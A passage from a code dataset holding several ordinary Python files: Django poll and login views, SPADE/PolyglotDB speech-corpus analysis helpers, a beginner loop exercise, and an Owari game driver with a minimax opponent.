model = Question\n template_name = 'polls/results.html'\n\n\ndef vote(request, question_id):\n question = get_object_or_404(Question, pk=question_id)\n try:\n selected_choice = question.choice_set.get(pk=request.POST['choice'])\n except (KeyError, Choice.DoesNotExist):\n # Redisplay the question voting form.\n return render(request, 'polls/post_details.html', {\n 'question': question,\n 'error_message': \"You didn't select a choice.\",\n })\n else:\n selected_choice.votes += 1\n selected_choice.save()\n # Always return an HttpResponseRedirect after successfully dealing\n # with POST data. This prevents data from being posted twice if a\n # user hits the Back button.\n return HttpResponseRedirect(reverse('polls:results', args=(question.id,)))\n\n\ndef signup(request):\n if request.method == 'POST':\n form = UserCreationForm(request.POST)\n if form.is_valid():\n form.save()\n username = form.cleaned_data.get('username')\n raw_password = form.cleaned_data.get('password1')\n user = authenticate(username=username, password=raw_password)\n login(request, user)\n request.session['login_check'] = True\n request.session['username'] = user.username\n return redirect('/posts')\n else:\n form = UserCreationForm()\n return render(request, 'polls/signup.html', {'form': form})\n\n\ndef signin(request):\n if request.method == 'POST':\n form = AuthenticationForm(data=request.POST)\n if form.is_valid():\n user = form.get_user()\n login(request, user)\n request.session['login_check'] = True\n request.session['username'] = user.username\n return redirect('/posts')\n else:\n form = AuthenticationForm()\n return render(request, 'polls/login.html', {'form': form})\n\n\ndef logout(request):\n # Deletes the current session data from the session and deletes the session cookie\n request.session.flush()\n return redirect('/')\n\n\ndef add_comment(request):\n question = Question.objects.get(pk=request.POST['qPK'])\n question.comments_set.create(comment_text=request.POST['comment'],\n comment_author=request.session.get('username'), pub_date=timezone.now())\n question.save()\n\n return redirect('/posts/' + request.POST['qPK'] + '/')\n\n\ndef new_post(request):\n if request.method == \"POST\":\n question = Question()\n question.author = request.session.get('username')\n question.pub_date = timezone.now()\n question.save()\n question.question_text = request.POST['question_post']\n question.choice_set.create(choice_text=request.POST['choice1'])\n question.choice_set.create(choice_text=request.POST['choice2'])\n question.choice_set.create(choice_text=request.POST['choice3'])\n question.save()\n return redirect('/posts', pk=question.pk)\n return render(request, 'polls/new_post.html')\n","repo_name":"Daily120/dj_Project","sub_path":"polls/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"} +{"seq_id":"39153326516","text":"#################################################\n## Common functions for SPADE analysis scripts ##\n#################################################\n\n## this file defines functions and values shared between SPADE analysis scripts\n## such as performing basic speaker, lexical, and linguistic enrichments of corpora,\n## as well as functions for interacting with the ISCAN server\n\n## base functions\nimport time\nfrom datetime import datetime\nimport os\nimport sys\n\nsys.path.insert(0, '/mnt/e/Dev/Polyglot/PolyglotDB')\nimport re\nimport yaml\nimport csv\nimport platform\nimport polyglotdb.io as pgio\n\n## PolyglotDB functions\nfrom polyglotdb import CorpusContext\nfrom polyglotdb.utils import ensure_local_database_running\nfrom polyglotdb.config import CorpusConfig\nfrom polyglotdb.io.enrichment import enrich_speakers_from_csv, enrich_lexicon_from_csv\nfrom polyglotdb.acoustics.formants.refined import analyze_formant_points_refinement\nfrom polyglotdb.client.client import PGDBClient, ClientError\n\nbase_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\n# =============== CONFIGURATION ===============\n## default values for connecting to the server\nserver_ip = \"localhost\"\ndocker_ip = \"app\"\nserver_port = 8080\n\n## default values for formant enrichment (see formant analysis functions below)\nduration_threshold = 0.05\nnIterations = 20\n\n## default paths\nbase_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nsibilant_script_path = os.path.join(base_dir, 'Common', 'sibilant_jane_optimized.praat')\n\n# =============================================\nnow = datetime.now()\ndate = '{}-{}-{}'.format(now.year, now.month, now.day)\n\n\ndef load_token():\n token_path = os.path.join(base_dir, 'auth_token')\n if not os.path.exists(token_path):\n return None\n with open(token_path, 'r') as f:\n token = f.read().strip()\n return token\n\n\ndef save_performance_benchmark(config, task, time_taken):\n \"\"\"Calculate the runtime of a process and save it\"\"\"\n\n benchmark_folder = os.path.join(base_dir, 'benchmarks')\n os.makedirs(benchmark_folder, exist_ok=True)\n benchmark_file = os.path.join(benchmark_folder, 'benchmarks.csv')\n if not os.path.exists(benchmark_file):\n with open(benchmark_file, 'w', encoding='utf8') as f:\n writer = csv.writer(f, delimiter=',')\n writer.writerow(['Computer', 'Corpus', 'Date', 'Corpus_size', 'Task', 'Time'])\n with open(benchmark_file, 'a', encoding='utf8') as f:\n writer = csv.writer(f, delimiter=',')\n writer.writerow([platform.node(), config.corpus_name, date, get_size_of_corpus(config), task, time_taken])\n\n\ndef load_config(corpus_name):\n \"\"\"Open the YAML configuration file and check it is correctly structured\"\"\"\n\n path = os.path.join(base_dir, corpus_name, '{}.yaml'.format(corpus_name))\n if not os.path.exists(path):\n print('The config file for the specified corpus does not exist ({}).'.format(path))\n sys.exit(1)\n expected_keys = ['corpus_directory', 'input_format', 'dialect_code', 'unisyn_spade_directory',\n 'speaker_enrichment_file',\n 'speakers', 'vowel_inventory', 'stressed_vowels', 'sibilant_segments'\n ]\n with open(path, 'r', encoding='utf8') as f:\n conf = yaml.load(f)\n missing_keys = []\n for k in expected_keys:\n if k not in conf:\n missing_keys.append(k)\n\n ## check if the vowel prototypes file exists\n if not 'vowel_prototypes_path' in conf:\n conf['vowel_prototypes_path'] = ''\n print('no vowel prototypes path given, so using no prototypes')\n elif not os.path.exists(conf['vowel_prototypes_path']):\n conf['vowel_prototypes_path'] = ''\n print('vowel prototypes path not valid, so using no prototypes')\n\n if missing_keys:\n print('The following keys were missing from {}: {}'.format(path, ', '.join(missing_keys)))\n sys.exit(1)\n return conf\n\n\ndef call_back(*args):\n args = [x for x in args if isinstance(x, str)]\n if args:\n print(' '.join(args))\n\n\ndef reset(corpus_name):\n \"\"\"Remove the database files produced from import.\"\"\"\n\n with ensure_local_database_running(corpus_name, port=8080, ip=server_ip, token=load_token()) as params:\n config = CorpusConfig(corpus_name, **params)\n with CorpusContext(config) as c:\n print('Resetting the corpus.')\n c.reset()\n\ndef loading(config, corpus_dir, textgrid_format):\n \"\"\"Load the corpus\"\"\"\n\n ## first check if a database for the corpus\n ## has already been created\n with CorpusContext(config) as c:\n exists = c.exists()\n if exists:\n print('Corpus already loaded, skipping import.')\n return\n if not os.path.exists(corpus_dir):\n print('The path {} does not exist.'.format(corpus_dir))\n sys.exit(1)\n\n ## if there is no database file,\n ## begin with importing the corpus\n textgrid_format = textgrid_format.upper()\n with CorpusContext(config) as c:\n print('loading')\n\n ## Use the appropriate importer based\n ## on the format of the corpus\n if textgrid_format in [\"BUCKEYE\", \"B\"]:\n parser = pgio.inspect_buckeye(corpus_dir)\n elif textgrid_format == \"CSV\":\n parser = pgio.inspect_buckeye(corpus_dir)\n elif textgrid_format.lower() in [\"FAVE\", \"F\"]:\n parser = pgio.inspect_fave(corpus_dir)\n elif textgrid_format == \"ILG\":\n parser = pgio.inspect_ilg(corpus_dir)\n elif textgrid_format in [\"LABBCAT\", \"L\"]:\n parser = pgio.inspect_labbcat(corpus_dir)\n elif textgrid_format in [\"P\", \"PARTITUR\"]:\n parser = pgio.inspect_partitur(corpus_dir)\n elif textgrid_format in [\"MAUS\", \"W\"]:\n parser = pgio.inspect_maus(corpus_dir)\n elif textgrid_format in [\"TIMIT\", \"T\"]:\n parser = pgio.inspect_timit(corpus_dir)\n elif textgrid_format in [\"W\", \"maus\"]:\n parser = pgio.inspect_maus(corpus_dir)\n else:\n parser = pgio.inspect_mfa(corpus_dir)\n parser.call_back = call_back\n beg = time.time()\n c.load(parser, corpus_dir)\n end = time.time()\n time_taken = end - beg\n print('Loading took: {}'.format(time_taken))\n save_performance_benchmark(config, 'import', time_taken)\n\n\ndef basic_enrichment(config, syllabics, pauses):\n \"\"\"Enrich the corpus database with syllable and utterance information.\"\"\"\n\n with CorpusContext(config) as g:\n if not 'utterance' in g.annotation_types:\n ## encode utterances based on presence of an intervening pause\n ## default 150ms\n print('encoding utterances')\n begin = time.time()\n g.encode_pauses(pauses)\n g.encode_utterances(min_pause_length=0.15)\n time_taken = time.time() - begin\n print('Utterance enrichment took: {}'.format(time_taken))\n save_performance_benchmark(config, 'utterance_encoding', time_taken)\n\n if syllabics and 'syllable' not in g.annotation_types:\n ## encode syllabic information using maxmimum-onset principle\n print('encoding syllables')\n begin = time.time()\n g.encode_syllabic_segments(syllabics)\n g.encode_syllables('maxonset')\n time_taken = time.time() - begin\n print('Syllable enrichment took: {}'.format(time.time() - begin))\n save_performance_benchmark(config, 'syllable_encoding', time_taken)\n\n print('enriching utterances')\n if syllabics and not g.hierarchy.has_token_property('utterance', 'speech_rate'):\n begin = time.time()\n g.encode_rate('utterance', 'syllable', 'speech_rate')\n time_taken = time.time() - begin\n print('Speech rate encoding took: {}'.format(time.time() - begin))\n save_performance_benchmark(config, 'speech_rate_encoding', time_taken)\n\n if not g.hierarchy.has_token_property('utterance', 'num_words'):\n begin = time.time()\n g.encode_count('utterance', 'word', 'num_words')\n time_taken = time.time() - begin\n print('Word count encoding took: {}'.format(time.time() - begin))\n save_performance_benchmark(config, 'num_words_encoding', time_taken)\n\n if syllabics and not g.hierarchy.has_token_property('utterance', 'num_syllables'):\n begin = time.time()\n g.encode_count('utterance', 'syllable', 'num_syllables')\n time_taken = time.time() - begin\n print('Syllable count encoding took: {}'.format(time.time() - begin))\n save_performance_benchmark(config, 'num_syllables_encoding', time_taken)\n\n if syllabics and not g.hierarchy.has_token_property('syllable', 'position_in_word'):\n print('enriching syllables')\n begin = time.time()\n g.encode_position('word', 'syllable', 'position_in_word')\n time_taken = time.time() - begin\n print('Syllable position encoding took: {}'.format(time.time() - begin))\n save_performance_benchmark(config, 'position_in_word_encoding', time_taken)\n\n if syllabics and not g.hierarchy.has_token_property('syllable', 'num_phones'):\n begin = time.time()\n g.encode_count('syllable', 'phone', 'num_phones')\n time_taken = time.time() - begin\n print('Phone count encoding took: {}'.format(time.time() - begin))\n save_performance_benchmark(config, 'num_phones_encoding', time_taken)\n\n if syllabics and not g.hierarchy.has_token_property('word', 'num_syllables'):\n begin = time.time()\n g.encode_count('word', 'syllable', 'num_syllables')\n time_taken = time.time() - begin\n print('Syllable count encoding took: {}'.format(time.time() - begin))\n save_performance_benchmark(config, 'num_syllables_encoding', time_taken)\n\n print('enriching syllables')\n ## generate the word-level stress pattern, either from an external pronunciation dictionary\n ## or by the presence of numeric values on the vowel phones\n if syllabics and g.hierarchy.has_type_property('word', 'stresspattern') and not g.hierarchy.has_token_property(\n 'syllable',\n 'stress'):\n begin = time.time()\n g.encode_stress_from_word_property('stresspattern')\n time_taken = time.time() - begin\n print(\"encoded stress\")\n save_performance_benchmark(config, 'stress_encoding_from_pattern', time_taken)\n elif syllabics and re.search(r\"\\d\", syllabics[0]) and not g.hierarchy.has_type_property('syllable',\n 'stress'): # If stress is included in the vowels\n begin = time.time()\n g.encode_stress_to_syllables(\"[0-9]\", clean_phone_label=False)\n time_taken = time.time() - begin\n print(\"encoded stress\")\n save_performance_benchmark(config, 'stress_encoding', time_taken)\n\n\ndef lexicon_enrichment(config, unisyn_spade_directory, dialect_code):\n \"\"\"Enrich the database with lexical information, such as stress position and UNISYN phone labels.\"\"\"\n\n enrichment_dir = os.path.join(unisyn_spade_directory, 'enrichment_files')\n if not os.path.exists(enrichment_dir):\n print('Could not find enrichment_files directory from {}, skipping lexical enrichment.'.format(\n unisyn_spade_directory))\n return\n with CorpusContext(config) as g:\n\n for lf in os.listdir(enrichment_dir):\n path = os.path.join(enrichment_dir, lf)\n if lf == 'rule_applications.csv':\n if g.hierarchy.has_type_property('word', 'UnisynPrimStressedVowel1'.lower()):\n print('Dialect independent enrichment already loaded, skipping.')\n continue\n elif lf.startswith(dialect_code):\n if g.hierarchy.has_type_property('word', 'UnisynPrimStressedVowel2_{}'.format(\n dialect_code).lower()):\n print('Dialect specific enrichment already loaded, skipping.')\n continue\n else:\n continue\n begin = time.time()\n enrich_lexicon_from_csv(g, path)\n time_taken = time.time() - begin\n print('Lexicon enrichment took: {}'.format(time.time() - begin))\n save_performance_benchmark(config, 'lexicon_enrichment', time_taken)\n\n\ndef speaker_enrichment(config, speaker_file):\n \"\"\"Enrich the database with speaker information (e.g. age, dialect) from a speaker metadata file.\"\"\"\n\n if not os.path.exists(speaker_file):\n print('Could not find {}, skipping speaker enrichment.'.format(speaker_file))\n return\n with CorpusContext(config) as g:\n if not g.hierarchy.has_speaker_property('gender'):\n begin = time.time()\n enrich_speakers_from_csv(g, speaker_file)\n time_taken = time.time() - begin\n print('Speaker enrichment took: {}'.format(time.time() - begin))\n save_performance_benchmark(config, 'speaker_enrichment', time_taken)\n else:\n print('Speaker enrichment already done, skipping.')\n\n\ndef sibilant_acoustic_analysis(config, sibilant_segments, ignored_speakers=None):\n \"\"\"Encode sibilant class and analyze sibilants using the praat script.\"\"\"\n\n with CorpusContext(config) as c:\n if c.hierarchy.has_token_property('phone', 'cog'):\n print('Sibilant acoustics already analyzed, skipping.')\n return\n print('Beginning sibilant analysis')\n beg = time.time()\n if ignored_speakers:\n ## make a subset of the phones in database for sibilants: sibilants included\n ## in this subset are defined in the corpus's YAML configuration file\n q = c.query_graph(c.phone).filter(c.phone.label.in_(sibilant_segments))\n q = q.filter(c.phone.speaker.name.not_in_(ignored_speakers))\n ## check the phone is greater than 10ms:\n ## this is the usual time resolution for forced alignment\n q = q.filter(c.phone.duration > 0.01)\n q.create_subset(\"sibilant\")\n else:\n c.encode_class(sibilant_segments, 'sibilant')\n time_taken = time.time() - beg\n save_performance_benchmark(config, 'sibilant_encoding', time_taken)\n print('sibilants encoded')\n\n # analyze all sibilants using the Praat script (found at the path defined at the top of this script)\n beg = time.time()\n c.analyze_script(annotation_type='phone', subset='sibilant', script_path=sibilant_script_path, duration_threshold=0.01)\n end = time.time()\n time_taken = time.time() - beg\n print('Sibilant analysis took: {}'.format(end - beg))\n save_performance_benchmark(config, 'sibilant_acoustic_analysis', time_taken)\n\n\ndef formant_acoustic_analysis(config, vowels, vowel_prototypes_path, ignored_speakers=None, drop_formant=False, output_tracks = False, subset=\"vowel\", reset_formants=False):\n ## Function for performing the formant estimation and analysis.\n ## Input:\n ## - list of vowels to analyse\n ## - path to the vowel prototype file\n ## Output:\n ## - static (single point) formant and bandwith (F1-3, B1-3)\n ## for vowel phones included in the corpus\n with CorpusContext(config) as c:\n if vowels is not None:\n\n ## Define the object of formant analysis:\n ## phones in the list of vowels that are\n ## greater than 50ms in duration\n if ignored_speakers:\n q = c.query_graph(c.phone).filter(c.phone.label.in_(vowels))\n q = q.filter(c.phone.speaker.name.not_in_(ignored_speakers))\n q = q.filter(c.phone.duration >= 0.05)\n q.create_subset(subset)\n else:\n c.encode_class(vowels, subset)\n\n ## Check if formant estimation has already been completed\n ## for this corpus, and skip if so.\n if not reset_formants and not output_tracks and c.hierarchy.has_token_property('phone', 'F1'):\n print('Formant point analysis already done, skipping.')\n return\n elif not reset_formants and output_tracks and 'formants' in c.hierarchy.acoustics:\n print('Formant track analysis already done, skipping.')\n return\n\n print('Beginning formant analysis')\n beg = time.time()\n time_taken = time.time() - beg\n save_performance_benchmark(config, 'vowel_encoding', time_taken)\n print('vowels encoded')\n beg = time.time()\n\n ## Call the formant estimation function from the PolyglotDB package. Please see the PolyglotDB documentation\n ## (https://polyglotdb.readthedocs.io/en/latest/acoustics_encoding.html#encoding-formants) for details\n ## about how formants are estimated\n metadata = analyze_formant_points_refinement(c, subset, duration_threshold=duration_threshold,\n num_iterations=nIterations,\n vowel_prototypes_path=vowel_prototypes_path,\n drop_formant=drop_formant,\n output_tracks = output_tracks)\n end = time.time()\n time_taken = time.time() - beg\n print('Analyzing formants took: {}'.format(end - beg))\n save_performance_benchmark(config, 'formant_acoustic_analysis', time_taken)\n\n\ndef formant_export(config, corpus_name, dialect_code, speakers, vowels, ignored_speakers=None, output_tracks=True):\n ## Create and export a query using formants derived using the formant_acoustic_analysis function.\n\n ## Choose file output name depending on whether the query\n ## concerns a single-point or multi-point track measurements\n if output_tracks:\n csv_path = os.path.join(base_dir, corpus_name, '{}_formant_tracks.csv'.format(corpus_name))\n else:\n csv_path = os.path.join(base_dir, corpus_name, '{}_formants.csv'.format(corpus_name))\n ## Get list of relevant vowel columns from the UNISYN software\n other_vowel_codes = ['unisynPrimStressedVowel2_{}'.format(dialect_code),\n 'UnisynPrimStressedVowel3_{}'.format(dialect_code),\n 'UnisynPrimStressedVowel3_XSAMPA',\n 'AnyRuleApplied_{}'.format(dialect_code)]\n\n with CorpusContext(config) as c:\n print('Beginning formant export')\n beg = time.time()\n q = c.query_graph(c.phone)\n ## exclude tokens below 50ms\n q = q.filter(c.phone.duration >= 0.05)\n if speakers:\n q = q.filter(c.phone.speaker.name.in_(speakers))\n if ignored_speakers:\n q = q.filter(c.phone.speaker.name.not_in_(ignored_speakers))\n q = q.filter(c.phone.label.in_(vowels))\n\n ## Define the columns to be included in the query (i.e., exported in the CSV).\n ## Columns include speaker and lexical metadata, information about the phone (start, end, duration, etc),\n ## the phone's surrounding phonological environment, as well as columns referring to the formant values\n ## Note: the single-point CSV write one row per token, whilst the track CSV contains 21 rows per token\n ## (one per formant point measurement)\n if output_tracks:\n q = q.columns(c.phone.speaker.name.column_name('speaker'), c.phone.discourse.name.column_name('discourse'),\n c.phone.id.column_name('phone_id'), c.phone.label.column_name('phone_label'),\n c.phone.begin.column_name('begin'), c.phone.end.column_name('end'),\n c.phone.duration.column_name('duration'),\n c.phone.following.label.column_name('following_phone'),\n c.phone.previous.label.column_name('previous_phone'), c.phone.word.label.column_name('word'),\n c.phone.formants.track)\n else:\n q = q.columns(c.phone.speaker.name.column_name('speaker'), c.phone.discourse.name.column_name('discourse'),\n c.phone.id.column_name('phone_id'), c.phone.label.column_name('phone_label'),\n c.phone.begin.column_name('begin'), c.phone.end.column_name('end'),\n c.phone.syllable.stress.column_name('syllable_stress'),\n c.phone.syllable.word.stresspattern.column_name('word_stress_pattern'),\n c.phone.syllable.position_in_word.column_name('syllable_position_in_word'),\n c.phone.duration.column_name('duration'),\n c.phone.following.label.column_name('following_phone'),\n c.phone.previous.label.column_name('previous_phone'), c.phone.word.label.column_name('word'),\n c.phone.F1.column_name('F1'), c.phone.F2.column_name('F2'), c.phone.F3.column_name('F3'),\n c.phone.B1.column_name('B1'), c.phone.B2.column_name('B2'), c.phone.B3.column_name('B3'),\n c.phone.A1.column_name('A1'), c.phone.A2.column_name('A2'), c.phone.A3.column_name('A3'), c.phone.Ax.column_name('Ax'), c.phone.num_formants.column_name('num_formants'), c.phone.drop_formant.column_name('drop_formant'))\n\n ## Add UNISYN columns\n if c.hierarchy.has_type_property('word', 'UnisynPrimStressedVowel1'.lower()):\n q = q.columns(c.phone.word.unisynprimstressedvowel1.column_name('UnisynPrimStressedVowel1'))\n for v in other_vowel_codes:\n if c.hierarchy.has_type_property('word', v.lower()):\n q = q.columns(getattr(c.phone.word, v.lower()).column_name(v))\n for sp, _ in c.hierarchy.speaker_properties:\n if sp == 'name':\n continue\n q = q.columns(getattr(c.phone.speaker, sp).column_name(sp))\n\n ## Write query to a CSV file\n q.to_csv(csv_path)\n end = time.time()\n time_taken = time.time() - beg\n print('Query took: {}'.format(end - beg))\n print(\"Results for query written to \" + csv_path)\n save_performance_benchmark(config, 'formant_export', time_taken)\n\n\ndef sibilant_export(config, corpus_name, dialect_code, speakers, ignored_speakers=None):\n csv_path = os.path.join(base_dir, corpus_name, '{}_sibilants.csv'.format(corpus_name))\n with CorpusContext(config) as c:\n # export to CSV all the measures taken by the script, along with a variety of data about each phone\n print(\"Beginning sibilant export\")\n beg = time.time()\n # filter data only to word-initial sibilants\n q = c.query_graph(c.phone).filter(c.phone.subset == 'sibilant')\n q = q.filter(c.phone.begin == c.phone.syllable.word.begin)\n # ensure that all phones are associated with a speaker\n if speakers:\n q = q.filter(c.phone.speaker.name.in_(speakers))\n if ignored_speakers:\n q = q.filter(c.phone.speaker.name.not_in_(ignored_speakers))\n # this exports data for all sibilants\n # information about the phone, syllable, and word (label, start/endpoints etc)\n # also spectral properties of interest (COG, spectral peak/slope/spread)\n qr = q.columns(c.phone.speaker.name.column_name('speaker'),\n c.phone.discourse.name.column_name('discourse'),\n\n # phone-level information (label, start/endpoint, etc)\n c.phone.id.column_name('phone_id'), c.phone.label.column_name('phone_label'),\n c.phone.begin.column_name('phone_begin'), c.phone.end.column_name('phone_end'),\n c.phone.duration.column_name('duration'),\n\n # surrounding phone information\n c.phone.following.label.column_name('following_phone'),\n c.phone.previous.label.column_name('previous_phone'),\n\n # word and syllable information (e.g., stress,\n # onset/nuclus/coda of the syllable)\n # determined from maximum onset algorithm in\n # basic_enrichment function\n c.phone.syllable.word.label.column_name('word'),\n c.phone.syllable.word.id.column_name('word_id'),\n c.phone.syllable.stress.column_name('syllable_stress'),\n c.phone.syllable.phone.filter_by_subset('onset').label.column_name('onset'),\n c.phone.syllable.phone.filter_by_subset('nucleus').label.column_name('nucleus'),\n c.phone.syllable.phone.filter_by_subset('coda').label.column_name('coda'),\n\n # acoustic information of interest (spectral measurements)\n c.phone.cog.column_name('cog'), c.phone.peak.column_name('peak'),\n c.phone.slope.column_name('slope'), c.phone.spread.column_name('spread'))\n\n # get columns of speaker metadata\n for sp, _ in c.hierarchy.speaker_properties:\n if sp == 'name':\n continue\n q = q.columns(getattr(c.phone.speaker, sp).column_name(sp))\n\n # as Buckeye has had labels changed to reflect phonetic realisation,\n # need to also get the original transcription for comparison with\n # other corpora\n if c.hierarchy.has_token_property('word', 'surface_transcription'):\n print('getting underlying and surface transcriptions')\n q = q.columns(\n c.phone.word.transcription.column_name('word_underlying_transcription'),\n c.phone.word.surface_transcription.column_name('word_surface_transcription'))\n\n # write the query to a CSV\n qr.to_csv(csv_path)\n end = time.time()\n time_taken = time.time() - beg\n print('Query took: {}'.format(end - beg))\n print(\"Results for query written to \" + csv_path)\n save_performance_benchmark(config, 'sibilant_export', time_taken)\n\ndef polysyllabic_export(config, corpus_name, dialect_code, speakers):\n csv_path = os.path.join(base_dir, corpus_name, '{}_polysyllabic.csv'.format(corpus_name))\n with CorpusContext(config) as c:\n\n print(\"Beginning polysyllabic export\")\n beg = time.time()\n q = c.query_graph(c.syllable)\n q = q.filter(c.syllable.word.end == c.syllable.word.utterance.end)\n q = q.filter(c.syllable.begin == c.syllable.word.begin)\n if speakers:\n q = q.filter(c.phone.speaker.name.in_(speakers))\n\n qr = q.columns(c.syllable.speaker.name.column_name('speaker'),\n c.syllable.label.column_name('syllable_label'),\n c.syllable.duration.column_name('syllable_duration'),\n c.syllable.word.label.column_name('word'),\n c.syllable.word.stresspattern.column_name('stress_pattern'),\n c.syllable.word.num_syllables.column_name('num_syllables'))\n for sp, _ in c.hierarchy.speaker_properties:\n if sp == 'name':\n continue\n q = q.columns(getattr(c.syllable.speaker, sp).column_name(sp))\n\n qr.to_csv(csv_path)\n end = time.time()\n time_taken = time.time() - beg\n print('Query took: {}'.format(end - beg))\n print(\"Results for query written to \" + csv_path)\n save_performance_benchmark(config, 'polysyllabic_export', time_taken)\n\ndef get_size_of_corpus(config):\n from polyglotdb.query.base.func import Sum\n with CorpusContext(config) as c:\n c.config.query_behavior = 'other'\n if 'utterance' not in c.annotation_types:\n q = c.query_graph(c.word).columns(Sum(c.word.duration).column_name('result'))\n else:\n q = c.query_graph(c.utterance).columns(Sum(c.utterance.duration).column_name('result'))\n results = q.all()\n return results[0]['result']\n\ndef check_database(corpus_name, token = load_token(), port = 8080):\n host = 'http://localhost:{}'.format(port)\n client = PGDBClient(host, token)\n try:\n client.start_database(corpus_name)\n except Exception as e:\n print(\"Database problem: {}\".format(e))\n\ndef basic_queries(config):\n from polyglotdb.query.base.func import Sum\n with CorpusContext(config) as c:\n print(c.hierarchy)\n print('beginning basic queries')\n beg = time.time()\n q = c.query_lexicon(c.lexicon_phone).columns(c.lexicon_phone.label.column_name('label'))\n results = q.all()\n print('The phone inventory is:', ', '.join(sorted(x['label'] for x in results)))\n for r in results:\n total_count = c.query_graph(c.phone).filter(c.phone.label == r['label']).count()\n duration_threshold_count = c.query_graph(c.phone).filter(c.phone.label == r['label']).filter(\n c.phone.duration >= duration_threshold).count()\n qr = c.query_graph(c.phone).filter(c.phone.label == r['label']).limit(1)\n qr = qr.columns(c.phone.word.label.column_name('word'),\n c.phone.word.transcription.column_name('transcription'))\n res = qr.all()\n if len(res) == 0:\n print('An example for {} was not found.'.format(r['label']))\n else:\n res = res[0]\n print('An example for {} (of {}, {} above {}) is the word \"{}\" with the transcription [{}]'.format(\n r['label'], total_count, duration_threshold_count, duration_threshold, res['word'],\n res['transcription']))\n\n q = c.query_speakers().columns(c.speaker.name.column_name('name'))\n results = q.all()\n print('The speakers in the corpus are:', ', '.join(sorted(x['name'] for x in results)))\n c.config.query_behavior = 'other'\n q = c.query_graph(c.utterance).columns(Sum(c.utterance.duration).column_name('result'))\n results = q.all()\n q = c.query_graph(c.word).columns(Sum(c.word.duration).column_name('result'))\n word_results = q.all()\n print('The total length of speech in the corpus is: {} seconds (utterances) {} seconds (words'.format(\n results[0]['result'], word_results[0]['result']))\n time_taken = time.time() - beg\n save_performance_benchmark(config, 'basic_query', time_taken)\n\n\ndef basic_size_queries(config):\n from statistics import mean\n import datetime\n from polyglotdb.query.base.func import Sum, Count\n with CorpusContext(config) as c:\n print('beginning size queries')\n speaker_q = c.query_speakers().columns(c.speaker.name.column_name('name'), Count(c.speaker.discourses.name).column_name('num_discourses'))\n\n average_num_discourses = mean(x['num_discourses'] for x in speaker_q.all())\n discourse_q = c.query_discourses().columns(c.discourse.name.column_name('name'), c.discourse.duration.column_name('duration'), Count(c.discourse.speakers.name).column_name('num_speakers'))\n average_duration = mean(x['duration'] for x in discourse_q.all() if x['duration'] is not None)\n average_num_speakers = mean(x['num_speakers'] for x in discourse_q.all())\n speaker_word_counts = []\n for s in c.speakers:\n q = c.query_graph(c.word).filter(c.word.speaker.name == s)\n speaker_word_counts.append(q.count())\n discourse_word_counts = []\n for d in c.discourses:\n q = c.query_graph(c.word).filter(c.word.discourse.name == d)\n discourse_word_counts.append(q.count())\n print('')\n print('')\n print('There are {} speakers and {} discourses in the corpus.'.format(speaker_q.count(), discourse_q.count()))\n print('The average duration of discourses is {}.'.format(datetime.timedelta(seconds=average_duration)))\n print('The average number of words per speaker is {} and speakers speak in {} discourses on average.'.format(mean(speaker_word_counts), average_num_discourses))\n print('The average number of words per discourse is {} and have {} speakers on average.'.format(mean(discourse_word_counts), average_num_speakers))\n","repo_name":"MontrealCorpusTools/SPADE","sub_path":"Common/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":32534,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"98"} +{"seq_id":"26582980723","text":"i = 0\nwhile(i <= 5):\n print(\"The value of i is\" , i)\n i += 1 # i = i+1\nprint(\"Finished the program\")\n#print the sum of value\nnum = 1\nsum = 0\nprint(\"Enter any number. Please Enterd the 0 for exit the program\")\nwhile num != 0:\n num = float(input(\"Number ?\"))\n sum = sum + num;\n print(sum)\n# guse number\nimport random\ntarget_num, guess_num = random.randint(1, 10), 0\nwhile target_num != guess_num:\n guess_num = int(input('Guess a number between 1 and 10 until you get it right : '))\nprint('Well guessed!')\n# resvers a string\nword = input(\"Enter any world\")\nfor char in range(len(word) - 1, -1, -1):\n print(word[char], end=\"\")\nprint(\"\\n\")\n\n\n","repo_name":"Quratulainmumtaz/Basic-Python","sub_path":"looping programming.py","file_name":"looping programming.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"} +{"seq_id":"26799520417","text":"# CSCE A405 Assignment 3\n# Authors: Vadim Egorov and Jared Vitug\n# Update date: 10/25/2021\n\nfrom Owari import Owari\nfrom MMABP import MMABP\nfrom copy import deepcopy\n\n\n# Decide who is going first\ndef get_first_move(ow):\n while True:\n first_move = input(\n \"Do you want to move first? (Enter: Yes/No, y/n) \\n\")\n\n if first_move.lower() == \"yes\" or first_move.lower() == \"y\":\n print(\"\\nNorth moves first!\")\n break\n elif first_move.lower() == \"no\" or first_move.lower() == \"n\":\n print(\"\\nSouth moves first!\")\n ow.set_turn()\n break\n\n# Play a game with computer\ndef human_vs_computer(ow, depth):\n # Decide who is going first\n get_first_move(ow)\n\n print(\"\\n GAME STARTED\")\n ow.display_board()\n\n while True:\n if ow.turn == \"north\":\n # Make human move\n ow.get_human_move()\n ow.display_board()\n # Change turn\n ow.set_turn()\n else:\n # Get the best move\n pit = MMABP().get_computer_move(deepcopy(ow.board), deepcopy(ow.turn), depth)\n # Make a computer move\n ow.move(pit)\n ow.display_board()\n # change turn\n ow.set_turn()\n\n # Check if game is over\n if ow.game_over():\n print(\"\\nGame Over!!!\")\n ow.display_board()\n break\n\n # Decide a winner\n if ow.board[6] == ow.board[13]:\n print(\"\\n Tie!\")\n elif ow.board[6] > ow.board[13]:\n print(\"\\nSouth won!\")\n else:\n print(\"\\nNorth won!\")\n\ndef human_vs_human(ow):\n get_first_move(ow)\n print(\"\\n GAME STARTED\")\n ow.display_board()\n\n while True:\n # Make human move\n ow.get_human_move()\n ow.display_board()\n # Change turn\n ow.set_turn()\n\n # Check if game is over\n if ow.game_over():\n print(\"\\nGame Over!!!\")\n ow.display_board()\n break\n\n # Decide a winner\n if ow.board[6] == ow.board[13]:\n print(\"\\n Tie!\")\n elif ow.board[6] > ow.board[13]:\n print(\"\\nSouth won!\")\n else:\n print(\"\\nNorth won!\")\n\n\ndef main():\n depth = 10\n # Start a game\n human_vs_computer(Owari(), depth)\n # human_vs_human(Owari())\n\n\nif __name__ == \"__main__\":\n 